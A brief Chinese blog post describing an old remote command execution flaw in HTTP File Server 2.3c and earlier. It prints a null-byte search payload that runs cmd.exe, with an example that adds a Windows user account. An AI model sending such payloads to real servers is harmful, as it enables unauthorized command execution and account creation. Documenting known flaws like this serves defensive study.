HFS的远程命令执行漏洞

一、HFS漏洞

1、影响版本 : 2.3c以前的2.3x版本

2、HFS:

HFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。

3、漏洞描述:

HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。

Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。

4、payload:

Payload:http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c [Command-String].}

攻击过程实例

http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c net user test1234 1234 /add.}

后话

我的是在官网下的。版本2.3m,有时传下东西是挺方便的

https://www.rejetto.com/hfs/?f=dl

搞到我跑去看了下我的,我就纳闷我的怎么每叼事,复现不了

 

在看了下资料,N年前的洞洞了,对指定版本有效。

加的群有点乱,也不知道在那个群上面看到有放这个提权工具。

没个卵用,了解下就好

发表评论

邮箱地址不会被公开。 必填项已用*标注